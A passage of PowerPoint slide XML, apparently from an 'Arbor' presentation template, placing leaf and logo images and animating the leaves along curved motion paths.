          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="email">
            <a:alphaModFix amt="80000"/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6500861" y="1707612"/>
            <a:ext cx="1100606" cy="465923"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Picture 21" descr="Arbor_Leaf_Yellow.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId13" cstate="email">
            <a:alphaModFix amt="80000"/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="491390">
            <a:off x="5532130" y="3144773"/>
            <a:ext cx="833566" cy="305641"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Picture 22" descr="Arbor_Leaf_Yellow.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId14" cstate="email">
            <a:alphaModFix amt="80000"/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="18083058">
            <a:off x="7695347" y="-155321"/>
            <a:ext cx="1533989" cy="690655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Picture 24" descr="Arbor_Logo.png"/>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298531" y="309013"/>
            <a:ext cx="1523898" cy="487648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="238262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2625 -0.57222 C -0.25972 -0.55995 -0.25815 -0.54768 -0.25364 -0.5368 C -0.2335 -0.48703 -0.19027 -0.45764 -0.15763 -0.4199 C -0.15399 -0.41574 -0.15104 -0.41111 -0.1467 -0.4074 C -0.13402 -0.39699 -0.11892 -0.39028 -0.10677 -0.37824 C -0.08975 -0.36134 -0.07864 -0.3456 -0.05607 -0.33634 C -0.03402 -0.32778 0.00122 -0.32916 0.02188 -0.32801 C 0.02553 -0.32778 0.029 -0.32639 0.03264 -0.32639 C 0.06025 -0.325 0.08837 -0.32708 0.11615 -0.32407 C 0.11806 -0.32407 0.11528 -0.31944 0.11424 -0.31759 C 0.11112 -0.31342 0.1073 -0.30879 0.1033 -0.30509 C 0.09323 -0.29629 0.08125 -0.29051 0.07084 -0.2824 C 0.06285 -0.27615 0.03976 -0.25648 0.03264 -0.24884 C 0.02466 -0.24074 0.02171 -0.23217 0.01112 -0.22801 C 0.0033 -0.22106 -0.00746 -0.21134 -0.01614 -0.2074 C -0.02447 -0.20347 -0.03385 -0.20347 -0.04166 -0.19907 C -0.09288 -0.16944 -0.13871 -0.17315 -0.19756 -0.17153 C -0.18906 -0.14699 -0.17604 -0.11782 -0.1559 -0.10301 C -0.1519 -0.10023 -0.14652 -0.09583 -0.14305 -0.09213 C -0.13159 -0.08078 -0.12517 -0.07315 -0.11041 -0.06713 C -0.10312 -0.06088 -0.09774 -0.05717 -0.08871 -0.0544 C -0.07413 -0.04583 -0.04791 -0.02453 -0.02899 -0.01898 C -0.01631 -0.01551 -0.00972 -0.0162 0.00556 -0.01481 C 0.01389 -0.00856 0.02553 -2.59259E-6 0.03629 -2.59259E-6 " pathEditMode="relative" rAng="0" ptsTypes="fffffffffffffffffffffffA">
                                      <p:cBhvr>
                                        <p:cTn id="6" dur="3600" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="19028" y="28611"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="7" presetID="0" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -0.17638 -0.5574 C -0.1743 -0.54258 -0.16753 -0.54096 -0.1611 -0.52962 C -0.15885 -0.52059 -0.1519 -0.5118 -0.14721 -0.50393 C -0.14322 -0.48749 -0.13419 -0.47152 -0.12499 -0.45925 C -0.12187 -0.45508 -0.1177 -0.45184 -0.11527 -0.44629 C -0.10503 -0.42476 -0.09357 -0.40277 -0.07916 -0.38541 C -0.07621 -0.38171 -0.05919 -0.3574 -0.04999 -0.35208 C -0.04287 -0.34791 -0.03489 -0.34559 -0.02777 -0.34096 C -0.02187 -0.3368 -0.01718 -0.33032 -0.0111 -0.32592 C -0.00242 -0.3199 0.00695 -0.31481 0.01529 -0.30763 C 0.02223 -0.30115 0.03056 -0.29282 0.0389 -0.28888 C 0.05539 -0.28124 0.07292 -0.28124 0.09029 -0.27777 C 0.09393 -0.27939 0.09758 -0.28032 0.1014 -0.28147 C 0.10279 -0.28217 0.10626 -0.28518 0.10556 -0.28333 C 0.10122 -0.27476 0.09376 -0.27476 0.08751 -0.27036 C 0.07622 -0.26296 0.06581 -0.25439 0.05417 -0.24814 C 0.04862 -0.24536 0.04272 -0.24421 0.03751 -0.24096 C 0.01095 -0.22546 -0.01353 -0.20046 -0.04166 -0.18888 C -0.05971 -0.18194 -0.07742 -0.17638 -0.09583 -0.17221 C -0.1177 -0.17383 -0.13958 -0.17337 -0.1611 -0.17592 C -0.17343 -0.17754 -0.19721 -0.18518 -0.19721 -0.18518 C -0.19912 -0.18657 -0.20173 -0.19143 -0.20277 -0.18888 C -0.20416 -0.18657 -0.20155 -0.1824 -0.19999 -0.17962 C -0.19183 -0.16411 -0.17985 -0.15046 -0.16944 -0.13703 C -0.14652 -0.10763 -0.12499 -0.06921 -0.0986 -0.04444 C -0.08385 -0.03055 -0.09669 -0.04606 -0.08333 -0.03518 C -0.05746 -0.01411 -0.06857 -0.01434 -0.04027 -0.0111 C -0.03315 -0.00925 -0.02933 -0.00439 -0.02221 -0.00184 C -0.0144 0.00047 -0.00833 5.18519E-6 5.27778E-6 5.18519E-6 " pathEditMode="relative" ptsTypes="ffffffffffffffffffffffffffffA">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="2900" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="17"/>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13889 -0.51482 C 0.13507 -0.50463 0.12986 -0.49537 0.12639 -0.48519 C 0.11962 -0.46551 0.11458 -0.44537 0.10694 -0.42593 C 0.10573 -0.42338 0.10399 -0.42107 0.10278 -0.41852 C 0.09896 -0.41134 0.09427 -0.40463 0.09167 -0.3963 C 0.08819 -0.38611 0.08177 -0.37014 0.07639 -0.36111 C 0.06823 -0.34792 0.05747 -0.34236 0.04722 -0.33333 C 0.03646 -0.32408 0.02188 -0.30903 0.01111 -0.29815 C 0.00556 -0.29283 0.00139 -0.28519 -0.00417 -0.27963 C -0.01667 -0.26783 -0.05747 -0.27083 -0.0625 -0.27037 C -0.08698 -0.26389 -0.09861 -0.27408 -0.11944 -0.27963 C -0.13108 -0.28287 -0.14253 -0.28542 -0.15417 -0.28704 C -0.16389 -0.2956 -0.15937 -0.29306 -0.16667 -0.2963 C -0.16771 -0.30023 -0.17014 -0.30857 -0.17222 -0.30556 C -0.17344 -0.30417 -0.17014 -0.30208 -0.16944 -0.3 C -0.16701 -0.29213 -0.16615 -0.2831 -0.1625 -0.27593 C -0.15903 -0.26921 -0.15278 -0.26551 -0.14861 -0.25926 C -0.13177 -0.23403 -0.11962 -0.20232 -0.1 -0.17963 C -0.08385 -0.16088 -0.05573 -0.14097 -0.03889 -0.11852 C -0.03611 -0.11482 -0.03385 -0.11042 -0.03056 -0.10741 C -0.02587 -0.10347 -0.02031 -0.10185 -0.01528 -0.09815 C -0.00451 -0.09028 0.00712 -0.07871 0.01944 -0.07408 C 0.03993 -0.06667 0.06215 -0.06505 0.08333 -0.06296 C 0.0967 -0.06366 0.11007 -0.0632 0.12361 -0.06482 C 0.12865 -0.06551 0.13212 -0.07338 0.13472 -0.07778 C 0.13559 -0.07963 0.13872 -0.08472 0.1375 -0.08333 C 0.13142 -0.07801 0.12743 -0.06875 0.12083 -0.06482 C 0.10451 -0.05533 0.0901 -0.04167 0.075 -0.02963 C 0.06059 -0.01875 0.04705 -0.00648 0.03056 -0.00185 C 0.01736 0.00162 0.01806 1.48148E-6 2.5E-6 1.48148E-6 " pathEditMode="relative" ptsTypes="fffffffffffffffffffffffffffffA">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="3300" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>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2375 -0.51111 C 0.18524 -0.44167 0.13107 -0.38704 0.05555 -0.37778 C 0.04514 -0.37176 0.03524 -0.36319 0.025 -0.35741 C 0.00868 -0.34861 -0.00781 -0.3463 -0.025 -0.34444 C -0.04393 -0.34028 -0.06302 -0.33866 -0.08195 -0.33704 C -0.09705 -0.3294 -0.11059 -0.31944 -0.12639 -0.31667 C -0.14202 -0.31921 -0.15747 -0.31968 -0.17084 -0.33148 C -0.17222 -0.33264 -0.16806 -0.33032 -0.16667 -0.32963 C -0.1309 -0.28194 -0.08872 -0.24676 -0.04445 -0.21481 C -0.01077 -0.19051 0.02396 -0.1662 0.06111 -0.15185 C 0.07725 -0.15324 0.09357 -0.15278 0.10972 -0.15556 C 0.11684 -0.15694 0.12326 -0.16296 0.13055 -0.16481 C 0.13767 -0.16968 0.14514 -0.17384 0.15278 -0.17778 C 0.15416 -0.17731 0.15642 -0.17801 0.15694 -0.17593 C 0.15729 -0.17338 0.1493 -0.16481 0.14722 -0.16111 C 0.14323 -0.15463 0.13993 -0.14745 0.13611 -0.14074 C 0.12812 -0.12778 0.12031 -0.11481 0.1125 -0.10185 C 0.1059 -0.09143 0.0993 -0.07778 0.09028 -0.07222 C 0.0809 -0.06667 0.07344 -0.06111 0.06389 -0.05741 C 0.06094 -0.05648 0.05798 -0.05602 0.05555 -0.0537 C 0.05278 -0.05139 0.04722 -0.0463 0.04722 -0.0463 C 0.04149 -0.03495 0.03611 -0.03241 0.02778 -0.02593 C 0.02569 -0.02454 0.02396 -0.02222 0.02222 -0.02037 C 0.01944 -0.01782 0.01389 -0.01296 0.01389 -0.01296 C 0.00989 -0.00509 0.0059 -0.00417 3.05556E-6 -3.33333E-6 " pathEditMode="relative" ptsTypes="ffffffffffffffffffffffffA">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="3500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="22"/>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0.2375 -0.45949 C -0.21979 -0.41227 -0.19045 -0.38264 -0.15833 -0.35417 C -0.14513 -0.34236 -0.14774 -0.33982 -0.13333 -0.33195 C -0.12899 -0.3294 -0.12395 -0.32894 -0.11944 -0.32616 C -0.08906 -0.3081 -0.0585 -0.27986 -0.025 -0.2706 C 0.01615 -0.27153 0.0573 -0.27153 0.09862 -0.27269 C 0.18473 -0.27546 0.11372 -0.26968 0.16112 -0.28542 C 0.16841 -0.2882 0.18334 -0.29306 0.18334 -0.29306 C 0.18507 -0.29051 0.1882 -0.28889 0.18889 -0.28542 C 0.19046 -0.27662 0.17987 -0.27176 0.175 -0.26528 C 0.16407 -0.25139 0.15157 -0.23912 0.14306 -0.22245 C 0.13785 -0.21273 0.13455 -0.20093 0.12778 -0.19282 C 0.11042 -0.17407 0.08646 -0.1625 0.06667 -0.14838 C 0.04931 -0.13634 0.03334 -0.1206 0.01528 -0.11134 C 0.00556 -0.10648 -0.00451 -0.10255 -0.01388 -0.09676 C -0.03211 -0.08542 -0.02621 -0.0838 -0.03888 -0.07801 C -0.05451 -0.07176 -0.07118 -0.06968 -0.08611 -0.06134 C -0.09566 -0.06644 -0.10295 -0.07107 -0.11111 -0.07801 C -0.12638 -0.07153 -0.14218 -0.08611 -0.15555 -0.09468 C -0.1592 -0.1044 -0.16041 -0.10486 -0.16805 -0.10208 C -0.16111 -0.09468 -0.15468 -0.08542 -0.14722 -0.07801 C -0.13385 -0.06528 -0.1217 -0.05833 -0.10833 -0.04653 C -0.10416 -0.04306 -0.10052 -0.0382 -0.09583 -0.03542 C -0.08263 -0.0287 -0.06857 -0.02153 -0.05555 -0.01343 C -0.03263 0.00116 -0.03281 0.00347 -0.00833 0.00718 C -0.00659 0.00625 -0.00451 0.00648 -0.00277 0.00509 C -0.00138 0.0037 -1.11111E-6 -0.00023 -1.11111E-6 -0.00023 " pathEditMode="relative" ptsTypes="ffffffffffffffffffffffffffA">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="3100" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="14"/>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0.21389 -0.46806 C -0.20573 -0.44306 -0.19201 -0.4294 -0.17778 -0.41088 C -0.1599 -0.38681 -0.13733 -0.37176 -0.11528 -0.3551 C -0.10365 -0.34653 -0.09306 -0.33635 -0.08056 -0.3294 C -0.0724 -0.32477 -0.06406 -0.32084 -0.05556 -0.31644 C -0.05191 -0.31436 -0.04826 -0.31274 -0.04444 -0.31065 C -0.02222 -0.29862 -0.01076 -0.29445 0.01389 -0.29213 C 0.03698 -0.28774 0.06007 -0.28264 0.08333 -0.2794 C 0.10174 -0.2801 0.12031 -0.27917 0.13889 -0.28125 C 0.14444 -0.28172 0.15243 -0.29144 0.15833 -0.29422 C 0.1717 -0.29375 0.18542 -0.29584 0.19861 -0.29213 C 0.20104 -0.29167 0.19479 -0.2875 0.19306 -0.28496 C 0.19063 -0.28125 0.18872 -0.27709 0.18611 -0.27362 C 0.17344 -0.25834 0.16007 -0.24051 0.14583 -0.22755 C 0.10156 -0.1875 0.06667 -0.1632 0.01528 -0.14399 C -0.02865 -0.12801 -0.00174 -0.1338 -0.025 -0.1294 C -0.04236 -0.12153 -0.025 -0.12894 -0.06944 -0.12362 C -0.07795 -0.12269 -0.09444 -0.12014 -0.09444 -0.12014 C -0.10833 -0.12061 -0.1224 -0.12107 -0.13611 -0.12176 C -0.14479 -0.12269 -0.14635 -0.12408 -0.15417 -0.12755 C -0.15556 -0.12801 -0.15833 -0.1294 -0.15833 -0.1294 C -0.15937 -0.12755 -0.16181 -0.12593 -0.16111 -0.12362 C -0.15885 -0.11528 -0.14896 -0.10417 -0.14444 -0.09769 C -0.1408 -0.09237 -0.13542 -0.08264 -0.13056 -0.07732 C -0.09375 -0.03681 -0.04948 0.00023 -3.61111E-6 0.00023 " pathEditMode="relative" ptsTypes="ffffffffffffffffffffffffA">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="3000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="17" presetID="0" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.17916 -0.45556 C 0.17222 -0.44167 0.16267 -0.42801 0.15416 -0.41667 C 0.14774 -0.4081 0.13871 -0.4037 0.13194 -0.3963 C 0.10659 -0.36829 0.07847 -0.34745 0.04861 -0.32963 C 0.04201 -0.32593 0.01579 -0.3132 0.00972 -0.31111 C -0.00313 -0.30718 -0.02917 -0.30185 -0.02917 -0.30185 C -0.03941 -0.30255 -0.04966 -0.30278 -0.05973 -0.3037 C -0.06598 -0.3044 -0.06216 -0.30671 -0.06806 -0.30926 C -0.07466 -0.31227 -0.08351 -0.31366 -0.09028 -0.31482 C -0.09809 -0.31829 -0.10434 -0.31921 -0.1125 -0.32037 C -0.12032 -0.32315 -0.12587 -0.33009 -0.13334 -0.33333 C -0.13907 -0.33912 -0.14618 -0.34537 -0.15278 -0.34815 C -0.15417 -0.35 -0.15556 -0.35556 -0.15695 -0.3537 C -0.15851 -0.35185 -0.15539 -0.34884 -0.15417 -0.3463 C -0.15296 -0.34375 -0.15174 -0.3412 -0.15 -0.33889 C -0.14428 -0.33079 -0.13178 -0.31389 -0.12362 -0.30556 C -0.11789 -0.29977 -0.11007 -0.29676 -0.10556 -0.28889 C -0.09723 -0.27454 -0.0882 -0.2588 -0.07778 -0.2463 C -0.06355 -0.2294 -0.03507 -0.2088 -0.01667 -0.2037 C 0.01388 -0.1794 0.05711 -0.1757 0.09166 -0.17408 C 0.09861 -0.17292 0.10538 -0.17014 0.1125 -0.17037 C 0.14149 -0.17153 0.15954 -0.18333 0.18194 -0.20556 C 0.17725 -0.18727 0.1625 -0.17986 0.15277 -0.16667 C 0.14184 -0.15232 0.13507 -0.1338 0.125 -0.11852 C 0.11527 -0.10417 0.1059 -0.08958 0.09583 -0.07593 C 0.08159 -0.05718 0.09288 -0.06783 0.08333 -0.05926 C 0.071 -0.03218 0.05798 -0.03519 0.04166 -0.02037 C 0.0342 -0.01389 0.03038 -0.00995 0.01944 -0.00741 C 0.0125 -0.00602 0.00625 -0.0044 2.77778E-6 -7.40741E-7 " pathEditMode="relative" ptsTypes="ffffffffffffffffffffffffffffA">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="3400" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="19" presetID="0" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -0.17917 -0.34259 C -0.1783 -0.33565 -0.17865 -0.32847 -0.17639 -0.32222 C -0.17483 -0.31713 -0.16406 -0.3081 -0.16111 -0.30556 C -0.1566 -0.30093 -0.14653 -0.29352 -0.14167 -0.28889 C -0.13212 -0.27871 -0.14462 -0.28704 -0.12917 -0.27593 C -0.12708 -0.27454 -0.12465 -0.27361 -0.12222 -0.27222 C -0.11944 -0.2706 -0.11667 -0.26875 -0.11389 -0.26667 C -0.10243 -0.25834 -0.09705 -0.24398 -0.08194 -0.23889 C -0.06545 -0.22639 -0.05156 -0.22107 -0.03472 -0.20926 C -0.02378 -0.20162 -0.01458 -0.19329 -0.00278 -0.18704 C 0.03507 -0.16759 0.08698 -0.17269 0.125 -0.17037 C 0.09583 -0.15949 0.13472 -0.17616 0.10694 -0.15741 C 0.09566 -0.15 0.07569 -0.14005 0.0625 -0.13334 C 0.05017 -0.12755 0.03524 -0.12408 0.02361 -0.11667 C 0.01719 -0.11273 0.01181 -0.10625 0.00556 -0.10185 C -0.02483 -0.08079 -0.04722 -0.06806 -0.08056 -0.06297 C -0.09497 -0.05741 -0.10747 -0.05556 -0.12222 -0.05371 C -0.13437 -0.0544 -0.14722 -0.06134 -0.15833 -0.05556 C -0.16372 -0.05301 -0.14931 -0.04699 -0.14444 -0.04259 C -0.13663 -0.03565 -0.1191 -0.02408 -0.11389 -0.02222 C -0.0842 -0.01181 -0.0559 -0.00949 -0.025 -0.00556 C -0.01667 -0.00255 -0.00903 2.59259E-6 -3.05556E-6 2.59259E-6 " pathEditMode="relative" ptsTypes="fffffffffffffffffffffA">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="2900" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>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0.12362 -0.33889 C 0.10574 -0.30717 0.08733 -0.27777 0.06806 -0.24814 C 0.05782 -0.2331 0.03837 -0.19977 0.02362 -0.18889 C 0.00851 -0.17824 -0.0118 -0.1787 -0.02777 -0.17592 C -0.05208 -0.17199 -0.07395 -0.16736 -0.0986 -0.16504 C -0.11857 -0.16574 -0.13853 -0.16527 -0.15833 -0.16666 C -0.16267 -0.16713 -0.17447 -0.17361 -0.17083 -0.17037 C -0.13385 -0.13842 -0.09044 -0.11111 -0.04722 -0.09629 C -0.02395 -0.07777 0.00626 -0.06713 0.03334 -0.06111 C 0.05626 -0.04907 0.07778 -0.06157 0.10001 -0.07037 C 0.12726 -0.08148 0.15574 -0.08773 0.18334 -0.09814 C 0.16962 -0.07546 0.15053 -0.06759 0.13195 -0.0537 C 0.11581 -0.04213 0.10626 -0.03217 0.09028 -0.02407 C 0.0849 -0.02152 0.07865 -0.02199 0.07362 -0.01852 C 0.06615 -0.01365 0.06094 -0.00972 0.05278 -0.0074 C 0.05087 -0.00555 0.04931 -0.00301 0.04723 -0.00185 C 0.04272 0.00023 0.03334 0.00186 0.03334 0.00186 C 0.00087 -0.00023 0.01199 -4.07407E-6 7.22222E-6 -4.07407E-6 " pathEditMode="relative" ptsTypes="fffffffffffffffffA">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="3500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="16"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="23" presetID="0" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -0.18194 -0.32036 C -0.17708 -0.30046 -0.16198 -0.26759 -0.15 -0.2537 C -0.13576 -0.23703 -0.10486 -0.21828 -0.0875 -0.2111 C -0.07361 -0.20555 -0.06024 -0.19768 -0.04583 -0.19444 C -0.04028 -0.19328 -0.02917 -0.19073 -0.02917 -0.19073 C -0.01597 -0.18194 -0.03368 -0.19328 -0.00972 -0.18356 C 0.00642 -0.17684 0.02205 -0.1699 0.03889 -0.16481 C 0.05556 -0.1655 0.07222 -0.16527 0.08889 -0.16666 C 0.0941 -0.16735 0.09896 -0.17083 0.10417 -0.17222 C 0.11615 -0.17615 0.13004 -0.17939 0.14167 -0.18541 C 0.16024 -0.19513 0.14167 -0.18842 0.15556 -0.19259 C 0.15695 -0.19397 0.15816 -0.19745 0.15972 -0.19629 C 0.16094 -0.19559 0.15903 -0.19259 0.15833 -0.19073 C 0.1566 -0.18726 0.15538 -0.1824 0.15278 -0.17962 C 0.1434 -0.17083 0.13368 -0.1537 0.12361 -0.14814 C 0.11528 -0.14397 0.1066 -0.14073 0.09861 -0.13541 C 0.09306 -0.13171 0.08802 -0.12592 0.08195 -0.1243 C 0.07309 -0.12198 0.06649 -0.12083 0.05833 -0.11666 C 0.04184 -0.10925 0.02535 -0.09675 0.00833 -0.09282 C -0.04583 -0.09559 -0.05243 -0.08703 -0.08611 -0.10763 C -0.0934 -0.1118 -0.10052 -0.11272 -0.10694 -0.11851 C -0.10364 -0.09837 -0.10087 -0.09698 -0.09305 -0.07962 C -0.08976 -0.07198 -0.08611 -0.06272 -0.08194 -0.05555 C -0.07292 -0.03934 -0.04948 -0.02059 -0.03472 -0.01666 C -0.02604 -0.00972 -0.01042 7.03704E-6 -1.11111E-6 7.03704E-6 " pathEditMode="relative" ptsTypes="ffffffffffffffffffffffffA">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="3000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="25" presetID="0" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.05973 -0.28148 C 0.03247 -0.2331 -0.0144 -0.20347 -0.05555 -0.18356 C -0.06406 -0.1794 -0.07308 -0.17708 -0.08055 -0.17037 C -0.09374 -0.15949 -0.08749 -0.16227 -0.0986 -0.15926 C -0.1184 -0.1419 -0.14149 -0.15 -0.16249 -0.15926 C -0.16058 -0.15139 -0.14409 -0.13333 -0.13749 -0.12778 C -0.1085 -0.1044 -0.07638 -0.08842 -0.04166 -0.08704 C -0.0144 -0.08611 0.01285 -0.08588 0.04028 -0.08541 C 0.06129 -0.08287 0.07535 -0.08356 0.09584 -0.09259 C 0.1007 -0.09491 0.10591 -0.09699 0.11112 -0.09815 C 0.11563 -0.09977 0.12501 -0.10208 0.12501 -0.10208 C 0.12049 -0.08704 0.11251 -0.07407 0.10556 -0.06134 C 0.10278 -0.05625 0.10105 -0.04977 0.09723 -0.04629 C 0.08195 -0.0331 0.06476 -0.02546 0.04723 -0.02037 C 0.03855 -0.01481 0.02726 -0.01666 0.01945 -0.00926 C 0.01164 -0.00254 0.00921 2.96296E-6 5.27778E-6 2.96296E-6 " pathEditMode="relative" ptsTypes="fffffffffffffffA">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="3700" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="27" presetID="0" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -0.30139 -0.16481 C -0.29531 -0.15231 -0.28836 -0.14305 -0.27916 -0.13518 C -0.27517 -0.11875 -0.24687 -0.10093 -0.23333 -0.09815 C -0.22326 -0.0912 -0.21128 -0.08819 -0.2 -0.08518 C -0.15399 -0.08727 -0.125 -0.08912 -0.08472 -0.09444 C -0.07604 -0.09907 -0.06736 -0.10139 -0.05833 -0.10555 C -0.05659 -0.10741 -0.05052 -0.11111 -0.05277 -0.11111 C -0.05555 -0.11111 -0.05781 -0.10764 -0.05972 -0.10555 C -0.08159 -0.08148 -0.0618 -0.0993 -0.07361 -0.08889 C -0.07586 -0.08009 -0.07812 -0.07847 -0.08333 -0.07245 C -0.10607 -0.04653 -0.13402 -0.04676 -0.1625 -0.04444 C -0.16996 -0.04398 -0.17743 -0.04329 -0.18472 -0.04259 C -0.17899 -0.03495 -0.17309 -0.03356 -0.16527 -0.02778 C -0.15277 -0.01875 -0.14184 -0.00764 -0.12777 -0.00185 C -0.11736 0.00232 -0.10816 0.00232 -0.09722 0.0037 C -0.06371 0.01482 -0.08993 0.00741 -0.01666 0.00556 C -0.0125 0.00463 -0.00364 0.00463 2.77778E-7 -4.07407E-6 " pathEditMode="relative" ptsTypes="ffffffffffffffffA">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="3200" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="19"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="29" presetID="0" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
